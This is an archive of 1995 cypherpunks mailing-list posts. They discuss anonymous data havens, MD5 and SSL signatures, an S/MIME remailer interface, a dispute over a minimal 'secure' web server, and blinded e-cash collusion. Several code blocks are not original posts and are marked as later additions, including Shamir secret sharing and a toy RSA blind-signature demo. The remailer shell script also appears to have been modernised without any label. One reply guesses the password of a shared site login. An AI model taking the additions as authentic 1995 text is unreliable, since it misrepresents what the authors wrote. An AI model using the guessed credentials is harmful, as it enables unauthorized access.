Big deal.  It is the web equivalent of "Hello World".


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@obscura.com (Mixmaster)
Date: Tue, 24 Oct 95 13:11:13 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510242010.NAA15491@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain



To All,

    A theme I have been thinking about lately is a virtual
data haven using an m from n secret splitting scheme via
a DC Net for access and hosting the entire process via HTML
and W3. The salient feature would be database objects split in
such a way that participating sites would possess no more than 1
encrypted slice of any particular encrypted object. Some redundancy
of storage is built into the design and participating sites give up
local storage to store other slices of the datahaven. At no time is
the site hosting able to make correlations of slices to plaintext
traffic because the split is done on the user's workstation and the
placement of the individual slice on the member datahaven site is
accomplished with encrypted remailer tech (probably Mixmaster 2) and
CGI or java scripts. The idea here is to be able to store ANY
information on the net, not just what the local bluenoses approve of.

    anon
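An m-from-n split done on the user's workstation, as an added example that is not part of the original post. The post names no particular scheme; Shamir's polynomial threshold scheme over a prime field is assumed here, and the function names and sample key are constructed for illustration.

```python
import secrets

# Field modulus: the Mersenne prime 2^521 - 1, large enough for a 64-byte secret.
PRIME = 2 ** 521 - 1
MAX_SECRET_LEN = 64


def split(secret, m, n):
    """Split `secret` (bytes) into n slices so that any m of them recover it.

    Returns a list of (x, y) points on a random degree m-1 polynomial whose
    constant term encodes the secret. Each storage site would hold one point.
    """
    if not 1 <= m <= n:
        raise ValueError("need 1 <= m <= n")
    if len(secret) > MAX_SECRET_LEN:
        raise ValueError("secret too long for this field")
    # A leading 0x01 byte preserves leading zero bytes of the secret.
    constant = int.from_bytes(b"\x01" + secret, "big")
    coeffs = [constant] + [secrets.randbelow(PRIME) for _ in range(m - 1)]
    slices = []
    for x in range(1, n + 1):
        y = 0
        for c in reversed(coeffs):  # Horner evaluation of the polynomial at x
            y = (y * x + c) % PRIME
        slices.append((x, y))
    return slices


def interpolate_at_zero(slices):
    """Lagrange interpolation of the polynomial through `slices`, evaluated at 0."""
    xs = [x for x, _ in slices]
    if len(set(xs)) != len(xs):
        raise ValueError("duplicate slice index")
    total = 0
    for i, (xi, yi) in enumerate(slices):
        num, den = 1, 1
        for j, (xj, _) in enumerate(slices):
            if i != j:
                num = num * (-xj) % PRIME
                den = den * (xi - xj) % PRIME
        total = (total + yi * num * pow(den, -1, PRIME)) % PRIME
    return total


def recover(slices):
    """Rebuild the secret bytes from at least m slices.

    With fewer than m slices the result is an unrelated field element; the
    0x01 marker is a framing byte, not an integrity check.
    """
    value = interpolate_at_zero(slices)
    raw = value.to_bytes((value.bit_length() + 7) // 8 or 1, "big")
    if raw[0] != 1 or len(raw) > MAX_SECRET_LEN + 1:
        raise ValueError("slices do not decode to a framed secret")
    return raw[1:]


if __name__ == "__main__":
    # Constructed sample: a 16-byte object key with two leading zero bytes.
    key = bytes.fromhex("0000a1b2c3d4e5f60718293a4b5c6d7e")
    slices = split(key, m=3, n=5)
    print("recovered from slices 1,3,5:",
          recover([slices[0], slices[2], slices[4]]).hex())
```

Any site holding a single slice, or any group of fewer than m sites, learns nothing about the constant term, which is the property the post relies on when it says a hosting site cannot correlate slices with plaintext.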






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 24 Oct 95 10:15:03 PDT
To: cypherpunks@toad.com
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241442.AA12411@all.net>
Message-ID: <9510241714.AA22217@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>As to weaknesses, I seem to remember that someone managed to forge a
>modification to a program used to observe networks on a Sun so that it
>had the same MD5 checksum as the official trusted version.  But whether
>this is real is not strictly the issue. 

Ron has not mentioned such an event to me and if that were the case I would 
seriously doubt that he would not have been told about it. The only comment he 
generally makes is that he wrote MD5 because "MD4 was making me nervous".

>In the case of the trust being placed in MD5 by Netscape, the assumption
>being made (without adequate support as far as I can tell) is that an
>MD5 checksum cannot be forced, through a chosen plaintext attack, to

Netscape do not simply use the MD5 of the message, they are using (as I 
understand it) the PKCS#1 standard for making the signature. If not they 
probably have severe problems.

>There has been no limit given by anyone on this list to the level of
>trust they place in MD5.  Several people have posted (without
>contention) that MD5 is sufficiently trustworthy to trust billions of
>dollars in commerce to its being able to prevent a selected plaintext
>attack as alluded to above. 

NIST and the NSA trusted MD4 sufficiently to base SHA upon it. SHA is preferable 
in many ways to MD5, it has a different approach to extending the scheduling and 
resist differential cryptanalysis. There is a problem with the compressor 
function of MD5 which I dislike. This is fairly irrelevant though since SSL 
allows other digests to be used.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 24 Oct 95 13:21:00 PDT
To: baldwin@RSA.COM (RobertW.Baldwin) (baldwin)
Subject: Re: What is needed for S/MIME remailer ?
In-Reply-To: <9509248145.AA814556043@snail.rsa.com>
Message-ID: <199510242015.NAA20243@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


My understanding of S/MIME isn't excellent, so I figure there are
things I could be confused about which may make this a bit wrong..

I figure a command line S/MIME program which could easily be
integrated into a remailer would have the following features:

A) limit on number of multiple concurrent processes doing
decryption. Remailer spams have the bad effect of spawning hundreds of
concurrent PGPs on the mailhost, bringing things to a halt. Limiting
number of concurrent decryptions would help this problem.

B) A strong interaction with the UNIX shell, with the program
returning a return code based on whether or not the decryption
succeeded. (Remailers only do decryptions...) That way a remailer
could do something like:

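#!/bin/sh
umask 077
# Unpredictable temp file rather than /tmp/decrypted.$$
decrypted=$(mktemp /tmp/decrypted.XXXXXX) || exit 1
# smime exits 0 only if the decryption succeeded
if smime -f < incoming-message > "$decrypted"
then
  : # Process "$decrypted"
fi
rm -f incoming-message "$decrypted"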

	The option would also be a very low-cruft-output -- there
would be none of that PGP v2.6.2 stuff that PGP sends out. Just the
decrypted output and if the message can't be decrypted, nothing gets
output. (Maybe a -q option for that..)

	I think the smime should be easily plugged into premail as
well, but I don't know premail to know what would be necessary for
that. I suspect Raph would have some input on that matter.


> 
>         The other day I was wondering what it would take to make an
> anonymous remailer for an S/MIME client.  Implementing S/MIME from
> scratch is a lot of work given the lack of a public domain
> implementation, but it seems that a remailer could be built on top
> of a commercial email product that supported S/MIME.  The question
> is: What features should a commercial S/MIME email product have to
> make it easy to support a remailer?  Are there a small set of
> command line options that would greatly simplify a remailer
> implementation?
>                 --Bob Baldwin
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bsmith@gears.efn.org
Date: Tue, 24 Oct 95 06:15:56 PDT
To: cypherpunks@toad.com
Subject: Re: Re[2]: Verification of Registration
In-Reply-To: <9509248145.AA814550885@houston_cc_smtp.hai-net.com>
Message-ID: <199510240456.EAA08458@gears.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 95 09:01:39 EST, you said:

-     Yes
-     
-     wsh
-
-
-______________________________ Reply Separator _________________________________
-Subject: Re: Verification of Registration
-Author:  "Lynne L. Harrison" <lharrison@mhv.net> at internet
-Date:    24-10-95 09:03
-
-
-  Curious.  Did anyone else receive this unsolicited *invitation*?
-     
-At 11:31 PM 10/23/95 -0700, verify@cnet.com wrote:
->Your membership registration has been processed.  To become a full member
->of c|net online, please return the text of this message (to verify@cnet.com). 
 (snip)

Yes, I did too. What's going on? I don't want it....
==============================
*Billy     
*Roseburg, Oregon.USA 
*bsmith@gears.efn.org 
*smith.billy.r@roseburg.va.gov
*MIDI & Machine Guns 
==============================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 24 Oct 95 13:27:51 PDT
To: sameer <sameer@c2.org>
Subject: Re: What is needed for S/MIME remailer ?
In-Reply-To: <199510242015.NAA20243@infinity.c2.org>
Message-ID: <199510242027.NAA14942@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


sameer writes, among other things:

> A) limit on number of multiple concurrent processes doing
> decryption. Remailer spams have the bad effect of spawning hundreds of
> concurrent PGPs on the mailhost, bringing things to a halt. Limiting
> number of concurrent decryptions would help this problem.

Agreed.

> B) A strong interaction with the UNIX shell, with the program
> returning a return code based on whether or not the decryption
> succeeded. (Remailers only do decryptions...) That way a remailer
> could do something like:

We very much need a command line interface to S/MIME, to use in remailers
and also for other kinds of testing/hacking. I hope one is forthcoming
soon.

> 	I think the smime should be easily plugged into premail as
> well, but I don't know premail to know what would be necessary for
> that. I suspect Raph would have some input on that matter.

Raph does indeed have some input on the matter. I am currently rewriting
premail from the ground up, and am about 700 lines into it. One specific
design goal was the support of other types of encryption, including
Mixmaster and MOSS in the first release, and hopefully others as well.
Basically, I'm waiting on a command line S/MIME implementation as
described above, most hopefully as free software.

In any case, the new premail is _much_ more modular, so plugging in
experimental email stuff should be pretty straightforward.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 10:50:17 PDT
To: jeffb@sware.com (Jeff Barber)
Subject: Re: Does your software?
In-Reply-To: <199510241710.NAA18747@jafar.sware.com>
Message-ID: <9510241747.AA02533@all.net>
MIME-Version: 1.0
Content-Type: text


> Fred Cohen writes:
> 
> > The differences between my secure http server and Netscape's browser
> > are quite dramatic, [snip]
> 
> No doubt about that.  One's a real product, one's (primarily) a piece
> of puffery.

A secure get-only server for those of us who want security and the
normal functions required by most Web users most of the time. 

> > My get-only server cannot run outside applications, and hence does not
> > have the vulnerability of Netscape's browser.  Note also the distinction
> > between a server and a browser.
> 
> Note in particular the distinction between Fred's server and a real HTTP
> server:
> It does not run CGI scripts (i.e. no forms support).

That certainly increases the security.  Actually, we are now experimenting
with an execution server that allows some level of security while running
executables - have you tried using our secure forms interface?  Probably
not.

>  It does not have
> per-user access control.

Actually, it uses TCP wrappers, which provides a different sort of access
control.

>  It does not have URL mapping.

It is a secure, get-only server - as advertised.

>  It cannot
> redirect.

Actually, it does redirect, but not in the way you are used to.

>  All configuration is hard-coded into the binary.

That's one of the ways it is made secure.  If you want to change
configurations, you have to recompile.  Otherwise, dangerous config
changes can easily be made - that would be risky.

>  It doesn't
> support user directories (e.g. http://site/~yourname).

It doesn't allow access to the whole file system, thus gaining
additional protection from configuration errors, misuse, mismanagement,
etc.

>  It doesn't do
> server-side includes.

Get only - that's what it claims and that's what it does.

> It can't process the HEAD method.

Get only - that's what it claims and that's what it does.

>  It cannot create
> a directory index (if no index.html is present).

Get only - that's what it claims and that's what it does.

>  It does not support
> conditional retrieval (i.e. "If-modified-since").

Get only - that's what it claims and that's what it does.

>  It is slow (requires
> a separate process for each request).

Actually, it's faster (I've clocked it) than the NCSA server.

>  It is initiated by inetd for each
> HTTP connection and hence relies on that program's security as well (the
> "line-by-line analysis" of inetd is conspicuously missing from Fred's
> self-congratulatory whitepaper -- not to mention the OS on which it is
> intended to run). 

The claim is that it does not weaken the security provided by the
operating system.  Nothing else.

> It does not even have the capability to identify the
> content type of the retrieved file (apparently you must embed
> "Content-type: text/html\n\n" [or whatever] at the beginning of each HTML
> source file).

Get only - that's what it claims and that's what it does.

> I'm not saying it's completely useless, only that it does not constitute
> an HTTP server in the usual sense of the word.

Right.  It's a SECURE get only http server.  The usual sense of the word
means insecure.

>  Hence, Fred's continued
> boasting of this prodigious feat of programming prowess is complete
> bullshit.

I never boasted it was a prodigious feat at all.  In fact, I published
the fact that it was written in a few hours because I got tired of
worrying about and fixing the insecure servers available over the net. 
It is in the process of being proven to meet the security requirements,
which is a prodigious feat (and which I am not doing).

>  And, incidentally, the programming style, with its reliance
> on global fixed-length buffers, shared variables, lack of prototypes,
> forgotten function arguments,

Actually, not true.  The global fixed-length buffers, shared variables,
and lack of prototypes provide protection against allocation problems
which could result in denial of service, corruptions at near-capacity
load, and other similar security problems.

> absence of error checking on system call
> returns, 

The error checking on system call returns is quite thorough for the
purposes required.  Where no check is done, it is because the check
is not required.

> etc. is more suggestive of a first year CS student than an
> alleged PhD, *and* demonstrates a style more typical of a BASIC
> programmer than a C programmer.

I realize now that you think that all Ph.D.s program like you do, but in
this case, the style of the program is intended to meet the requirement
of the task.  Unlike many who learned in the "structured programming"
method, I believe that different program requirements call for different
programming styles.  This program is in a style suited to the
requirements which include, among other things, verifiability, small
size, ease of understanding, controls on the flow of information,
integrity, availability, confidentiality, and redundancy.  But at any
rate, there's no accounting for taste.

>  Don't try this at home, kids; this is
> NOT the way to write "secure" software unless your whole program fits
> in 80 lines too.

If it doesn't, it's probably going to be very hard to demonstrate security.

> > My get-only server is available in source form, is 80 lines long and
> > thus easily understood, has been shown to meet security properties,
> 
> [blah blah]
> 
> Big deal.  It is the web equivalent of "Hello World".

Yet it services more than one request per minute, 24 hours, 7 days, and
has done so without denial of services, corruption, or leakage since its
first implementation.  It's so small it can be verified, it's faster
than the retail brand, and it doesn't have all the holes we keep finding
in the other servers.  Different strokes for different folks.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 24 Oct 95 14:04:22 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232350.QAA17025@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951024133910.26964D-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Hal wrote:

> This is an interesting idea but it is more complicated than necessary, I
> think.  The denomination can be carried in the exponent, in which case
> there is no need for cut and choose and nobody can cheat the bank.  A
> coin suitable for deposit is a signed number of some special form.  To
> pay Bob, Alice does not withdraw anything ahead of time.  Rather, Bob
> gives her a blinded coin, which she reblinds and gives to the bank.  The
> bank signs it (debiting Alice's account) and gives it back to her.  She
> strips off her blinding and gives it to Bob.  He strips off his own
> blinding and verifies that he is left with a signed number of the
> appropriate form.

Using the above protocol, payee anonymity will not be compromised by 
collusion between the bank and the payer, but the payee and the bank can 
collude to identify the payer!  (This reverses the situation in normal 
Chaumian ecash, and of course in certain circumstances may be preferable.)

This collusion can succeed even if Alice (the payer) reblinds the coin 
she gets from Bob before asking the bank to sign it, because Alice must 
withdraw the coin after Bob gives it to her and before returning it to Bob.  
Bob can ask the bank to record the names of everyone who withdrew money 
during that period, and after two or three repeated transactions can 
narrow the list of possible payers down to one person.  (This is reminiscent 
of the time-correlation attack on remailers.)  In the original protocol 
this isn't possible because Alice can withdraw the money ahead of time.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:52:29 1999
Subject: No Subject
Message-ID: <ea8c857ce980a5a1f2aa74a5a20dce97@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


It is interesting that the situation is so symmetrical.  Given
collusion with the bank by the other party, with regular ecash we
protect Alice's but not Bob's anonymity.  With this "reverse ecash" we
protect Bob but not Alice.  (Alice is the payor, Bob the payee.)

If people were allowed to exchange coins anonymously, either system
will provide anonymity for both parties.  (In the reverse ecash system
Alice hands the blinded proto-coins along with some regular coins
to the bank and receives blinded new coins.)

Earlier there was discussion of an ecash coin-exchanging service
("Charlie") designed to provide payee anonymity in the regular ecash
system.  Bob would send his newly-received coins to Charlie along with
blinded proto-coins.  Charlie would then exchange them at the bank and
send the new (blinded) coins back to Bob.  Charlie and Bob can be
anonymous to each other, but Bob has to trust Charlie with his coins.

A similar service would work for the reverse ecash system to protect
Alice's anonymity.  Bob blinds some proto-coins and sends them to
Alice, who further blinds them and sends them to Charlie along with
some regular coins of the same values.  Charlie exchanges the regular
coins for new coins using the doubly blinded proto-coins.  He gives the
blinded coins back to Alice, who unblinds them and gives them to Bob,
who removes the last blinding to reveal the valid coins.  It is Alice
in this protocol who has to trust Charlie with her coins.

Hal
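
The double-blinding exchange described above (Bob blinds, Alice reblinds, the bank signs, each strips their own factor), as an added example that is not part of the original posts. It assumes RSA blind signatures, a single denomination, a constructed toy key and a made-up coin format (`proto_coin`); every name in it is illustrative.

```python
import hashlib
import math
import secrets

# Constructed toy bank key built from two Mersenne primes; far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # bank's private signing exponent


def proto_coin(serial: int) -> int:
    """A number 'of special form': 48-bit serial followed by a 32-bit hash of it."""
    digest = hashlib.sha256(serial.to_bytes(6, "big")).digest()
    return (serial << 32) | int.from_bytes(digest[:4], "big")


def well_formed(coin: int) -> bool:
    """True when the low 32 bits are the expected hash of the serial."""
    return 0 < coin < 2**80 and proto_coin(coin >> 32) == coin


def random_unit() -> int:
    """Random blinding factor that is invertible modulo N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            return r


def blind(value: int, r: int) -> int:
    return (value * pow(r, E, N)) % N


def unblind(value: int, r: int) -> int:
    return (value * pow(r, -1, N)) % N


class Bank:
    def __init__(self):
        self.withdrawal_log = []  # (account, blinded value): all the bank sees
        self.spent = set()

    def sign_blinded(self, account: str, blinded: int) -> int:
        self.withdrawal_log.append((account, blinded))  # account is debited here
        return pow(blinded, D, N)

    def deposit(self, coin: int, sig: int) -> bool:
        ok = well_formed(coin) and pow(sig, E, N) == coin and coin not in self.spent
        if ok:
            self.spent.add(coin)
        return ok


def reverse_payment(bank, serial, r_bob=None, r_alice=None):
    """Run one payment; returns (coin, signature, value the bank saw)."""
    r_bob = r_bob or random_unit()
    r_alice = r_alice or random_unit()
    coin = proto_coin(serial)                      # Bob picks the coin
    from_bob = blind(coin, r_bob)                  # Bob -> Alice
    to_bank = blind(from_bob, r_alice)             # Alice -> bank (reblinded)
    signed = bank.sign_blinded("alice", to_bank)   # bank -> Alice
    to_bob = unblind(signed, r_alice)              # Alice -> Bob
    sig = unblind(to_bob, r_bob)                   # Bob strips his own blinding
    return coin, sig, to_bank


if __name__ == "__main__":
    bank = Bank()
    coin, sig, seen = reverse_payment(bank, serial=0x1234567890AB)
    print("bank saw at withdrawal:", hex(seen))
    print("bank sees at deposit:  ", hex(coin), "accepted:", bank.deposit(coin, sig))
```

The bank's log holds only the doubly blinded value, so it cannot match the deposit to the withdrawal by content; the withdrawal timing that Wei Dai points to is not hidden by blinding.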




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 24 Oct 95 12:10:25 PDT
To: x85849i1@cadet1.usma.edu
Subject: Re: Verification of Registration
In-Reply-To: <9510241456.AA25959@trotter.usma.edu>
Message-ID: <199510241909.PAA03898@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Raymond Val" writes:
>Lynne L. Harrison writes:
>
>>  Curious.  Did anyone else receive this unsolicited *invitation*?
>
>Everybody who receives mail from cypherpunks@toad.com received this
>message because the message was addressed to 
>cypherpunks@toad.com.  Apparently someone may have 
>joined this 'group' or service and used the cypherpunks address as 
>the e-mail address.  Mayhap the cypherpunks@toad.com / cypherpunks
>userid/password. 
>
>This would be my guess, of course.

Mine too.
>
>Does anybody know what this service does?

C|NET Central is a cable TV show which reports on the 'net.  The
service is their on-line address where you can get more details
on stuff they report.

Doesn't seem to be especially c-punks related, but I guess someone
didn't like the idea of having to reveal his identity just to look
at a web page.  You can probably assume that the password for the
"cypherpunks" userid on the server is either "cypherpunks" or
"writecode".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 14:25:37 PDT
To: sandoval@cic.teleco.ulpgc.es
Subject: Re: textbooks
Message-ID: <9510242121.AA07455@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm Cc:ing this to cypherpunks since I've gotten a lot of requests for this
information.

> From: sandoval@cic.teleco.ulpgc.es (Juan Domingo Sandoval Gonzalez)
> 
> Dear Patrick,
> Thanks for your info about "Network Security Private Communication
> in a PUBLIC World" by Kaufman, Perlman and Speciner.
> To buy it I need to know Who published it.
> Do you know the Editor house?
> 

"Network Security - PRIVATE Communication in a PUBLIC World", 1995, Prentice
Hall PTR, ISBN 0-13-061466-1, by Charlie Kaufman, Radia Perlman, and Mike
Speciner.

This book is amazing.  It explains hard concepts in ways that make them
seem obvious.  I can't state this too emphatically.  The style of the
book is conversational, approachable and a fun read, while at the same
time maintaining technical exactness to the point that you can implement
algorithms from the discussions in this book, (and understand how they
work.)

17.6.2 Coping with Export Controls is very interesting, detailing the weird
hoops that Lotus jumped through to retain as much security as possible while
still meeting export requirements.  The authors make the point that what
happens to you when you go through this process is almost random depending
on the times as well as the individual person you deal with.

The ASN.1 section is blunt about the space problems, and indeed much of the
book is refreshingly blunt about the stupidities involved in a lot of this
stuff.

The quick proof of why the initial and final permutations add nothing to 
the security of DES is presented in an informal and quite obvious sidebar.
The comment is made that by the same argument the permutation of the key
in the generating of per-round keys also adds nothing to security.

It also includes homework and would be a wonderful textbook.

Here's an abbreviated version of the TOC.  Note that the real index is much
richer than this.  I've given the complete version of section 3.3 to
illustrate.  All typos are mine.  I think we can no longer refer to Bruce's
book as the Bible, but must refer to the two books as the Scriptures;)

Could someone refer me to some good crypto oriented math books?  Preferably
something as readable as this:)

Chapter 1 Introduction

1.1  Roadmap to the book
1.2  What type of book is this
1.3  Terminology
1.4  Notation
1.5  Primer on Networking
1.6  Tempest
1.7  Firewalls/Security Gateways
1.8  Key Escrow for Law Enforcement
1.9  Key Escrow for Careless Users
1.10 Viruses, Worms, Trojan Horses
1.11 The Military Model of Security
1.12 Legal Issues

Chapter 2 Introduction to Cryptography

2.1  What is Cryptography
2.2  Breaking an Encryption Scheme
2.3  Types of Cryptographic Functions
2.4  Secret Key Cryptography
2.5  Public Key Cryptography
2.6  Hash Algorithms
2.7  Homework

Chapter 3 Secret Key Cryptography

3.1  Introduction
3.2  Generic Block Encryption
3.3  Data Encryption Standard (DES)
     3.3.1  DES Overview
     3.3.2  The Permutations of the Data
     3.3.3  Generating the Per-Round Keys
     3.3.4  A DES Round
     3.3.5  The Mangler Function
     3.3.6  Weak and Semi-Weak Keys
     3.3.7  What's So Special About DES?
3.4  International Data Encryption Algorithm (IDEA)
3.5  Using Secret Key Cryptography in Protocols
3.6  Encrypting a Large Message
3.7  Generating MICs
3.8  Multiple Encryption DES
3.9  Homework

Chapter 4 Hashes and Message Digests

4.1  Introduction
4.2  Nifty Things to Do with a Hash
4.3  MD2
4.4  MD4
4.5  MD5
4.6  SHS
4.7  Homework

Chapter 5 Public Key Algorithms
5.1  Introduction
5.2  Modular Arithmetic
5.3  RSA
5.4  Diffie-Hellman
5.5  Digital Signature Standard (DSS)
5.6  Zero Knowledge Proof Systems
5.7  Homework Problems

Chapter 6  Number Theory

6.1  Introduction
6.2  Modular Arithmetic
6.3  Primes
6.4  Euclid's Algorithm
6.5  Chinese Remainder Theorem
6.6  Zn*
6.7  Euler's Totient Function
6.8  Euler's Theorem
6.9  Homework Problems

Chapter 7 Authentication Problems

7.1  Password-Based Authentication
7.2  Address-Based Authentication
7.3  Cryptographic Authentication Protocols
7.4  Who is Being Authenticated
7.5  Passwords as Cryptographic Keys
7.6  Eavesdropping and Server Database Reading
7.7  Trusted Intermediaries
7.8  Session Key Establishment
7.9  Authorization
7.10 Delegation
7.11 Homework

Chapter 8 Authentication of People

8.1  Passwords
8.2  On-Line Password Guessing
8.3  Off-Line Password Guessing
8.4  How Big Should a Secret Be?
8.5  Eavesdropping
8.6  Passwords and Careless Users
8.7  Initial Password Distribution
8.8  Authentication Tokens
8.9  Physical Access
8.10 Biometrics
8.11 Homework

Chapter 9 Security Handshake Pitfalls

9.1  Login Only
9.2  Mutual Authentication
9.3  Integrity/Encryption for Data
9.4  Mediated Authentication (with KDC)
9.5  Bellovin-Merritt
9.6  Network Login and Password Guessing
9.7  Nonce Types
9.8  Picking Random Numbers
9.9  X.509 Problem
9.10 Performance Considerations
9.11 Authentication Protocol Checklist
9.12 Homework

Chapter 10 Kerberos V4

10.1 Introduction
10.2  Tickets and Ticket-Granting Tickets
10.3  Configuration
10.4  Logging Into the Network
10.5  Replicated KDCs
10.6  Realms
10.7  Interrealm Authentication
10.8  Key Version Numbers
10.9  Encryption for Privacy and Integrity
10.10 Encryption for Integrity Only
10.11 Network Layer Addresses in Tickets
10.12 Message Formats
10.13 Homework

Chapter 11 Kerberos V5

11.1  ASN.1
11.2  Names
11.3  Delegation of Rights
11.4  Ticket Lifetimes
11.5  Key Versions
11.6  Making Master Keys in Different Realms Different
11.7  Optimizations
11.8  Cryptographic Algorithms
11.9  Hierarchy of Realms
11.10 Evading Password-Guessing Attacks
11.11 Key Inside Authenticator
11.12 Double TGT Authentication
11.13 KDC Database
11.14 Kerberos V5 Messages
11.15 Homework

Chapter 12 Electronic Mail Security

12.1  Distribution Lists
12.2  Store and Forward
12.3  Security Services for Electronic Mail
12.4  Establishing Keys
12.5  Privacy
12.6  Authentication of the Source
12.7  Message Integrity
12.8  Non-Repudiation
12.9  Proof of Submission
12.10 Proof of Delivery
12.11 Message Flow Confidentiality
12.12 Anonymity
12.13 Containment
12.14 Annoying Text Format Issues
12.15 Names and Addresses
12.16 Old Messages
12.17 Homework

Chapter 13 Privacy Enhanced Mail (PEM)

13.1  Introduction
13.2  Establishing Keys
13.3  Some PEM History
13.4  Certificate Hierarchy
13.5  Certificate Revocation Lists (CRLs)
13.6  X.509 Certificates and CRLs
13.7  Reformatting Data to Get Through Mailers
13.8  General Structure of a PEM Message
13.9  Encryption
13.10 Source Authentication and Integrity Protection
13.11 Multiple Recipients
13.12 Bracketing PEM Messages
13.13 Remote Distribution List Exploders
13.14 Forwarding and Enclosures
13.15 Canonicalization
13.16 Unprotected Information
13.17 Message Formats
13.18 DES-CBC as MIC Doesn't Work
13.19 Homework

Chapter 14 PGP (Pretty Good Privacy)

14.1  Introduction
14.2  Overview
14.3  Key Distribution
14.4  Efficient Encoding
14.5  Certificate and Key Revocation
14.6  Signature Types
14.7  Your Private Key
14.8  Key Rings
14.9  Anomalies
14.10 Object Formats

Chapter 15 X.400

15.1  Overview of X.400
15.2  Security Functions Possible with X.400
15.3  Structure of an X.400 Message

Chapter 16 A Comparison of PEM, PGP, and X.400

16.1  Introduction
16.2  Certificate Hierarchy
16.3  Certificate Distribution
16.4  Encryption
16.5  Encoding of Transmitted Messages
16.6  Cryptographic Algorithms Supported
16.7  Recipients with Multiple Keys
16.8  Mail-Intermediary-Provided Functions

Chapter 17 More Security Systems

17.1  NetWare V3
17.2  NetWare V4
17.3  KryptoKnight
17.4  SNMP
17.5  DASS/SPX
17.6  Lotus Notes Security
17.7  DCE Security
17.8  Microsoft Security
17.9  Network Denial of Service
17.10 Clipper
17.11 Homework

Bibliography
Glossary
Index
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 24 Oct 95 14:21:57 PDT
To: cypherpunks@toad.com
Subject: Pointer to article on ex parte search & sezure
Message-ID: <Pine.ULT.3.91.951024141738.16343F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


That's where somebody, e.g. Microsoft or the Church of Scientology, gets 
US Federal Marshals to seize your computer.

Article <46j4t6$6od@newsbf02.news.aol.com> in alt.religion.scientology is 
a good article by Adam S. Bauman of the Los Angeles Times. You might find 
it interesting, but not quite relevant enough to post the whole thing 
here.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 24 Oct 95 11:21:08 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Does your software?
Message-ID: <acb2e00c09021004a7ac@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



>My get-only server is available in source form, is 80 lines long and
>thus easily understood, has been shown to meet security properties, is
>now in the process of being mathematically proven to meet those
>properties, and is published in a refereed journal which can be used to
>confirm its contents in detail.  Hence, I do provide secure distribution
>through purely physical means.
>
Uh, proofs only go so far. There was one Cornell CS professor who was a
real devotee of "proving" your programs correct. He even published one of
his proofs in a "refereed" journal. Big whoop. It still had an error.

Proofs can help identify flaws, but they can never rule out all flaws.
That's why their name is so bogus. I wouldn't be surprised if you could
prove that the Finger daemon, which is sort of like a really low-level
GET-ONLY HTTP server, is also safe. In fact, your math proving ability
could probably even prove the pre-Robert Morris finger daemon is safe and
secure. If programmers don't think of preventing finger requests longer
than 512 bytes then why should the head-in-the-clouds program provers?

- Peter


>--
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

P.S. "FC" is your log in and "FC" is found inscribed in the writings of the
Unabomber. Coincidence?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Tue, 24 Oct 95 14:39:46 PDT
To: cypherpunks@toad.com
